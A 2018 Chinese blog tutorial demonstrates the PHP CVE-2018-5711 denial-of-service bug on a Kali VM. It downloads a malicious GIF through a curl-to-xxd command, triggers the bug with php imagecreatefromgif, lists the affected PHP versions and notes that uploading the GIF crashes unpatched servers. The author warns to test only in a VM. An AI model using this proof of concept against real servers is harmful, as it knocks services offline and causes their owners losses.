台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了

原创 炫懿  2018-02-03 09:14:13  阅读 953 次 评论 4 条
摘要:

华夏人才济济呀,台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。一、检测我的虚拟机是否装有php-gd库1、运行命令:php -m | grep -i gd2、如果上图中没有出现gd,我们就需要装一下了。运行命令apt-get install php-gd。二、生成恶意的gif文件1、curl -L&

华夏人才济济呀,台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。


一、检测我的虚拟机是否装有php-gd库


1、运行命令:

php -m | grep -i gd

台湾黑客发现一张动图能宕掉一台服务器.jpg

2、如果上图中没有出现gd,我们就需要装一下了。运行命令

apt-get install php-gd。

台湾黑客发现一张动图能宕掉一台服务器1.jpg

二、生成恶意的gif文件

1、

curl -L https://git.io/vN0n4 | xxd -r > poc.gif


台湾黑客发现一张动图能宕掉一台服务器2.jpg


2、运行top命令看下我的CPU使用率

台湾黑客发现一张动图能宕掉一台服务器3.jpg

3、测试恶意代码:

php -r 'imagecreatefromgif("poc.gif");'

台湾黑客发现一张动图能宕掉一台服务器4.jpg


CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。


这个漏洞的影响版本范围如下:

PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1

  如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。


本文地址:https://wanbk.net/142.html
版权声明:本文为原创文章,版权归 炫懿 所有,欢迎分享本文,转载请保留出处!

发表评论


表情

评论列表

  1. 姬长信
    姬长信 【】  @回复

    https://blog.isoyu.com/archives/gongyiapi.html
    大佬要不要帮写篇文章推广下✌

  2. Gcod
    Gcod 【】  @回复

    前排围观大佬

  3. 姬长信
    姬长信 【】  @回复

    大佬大佬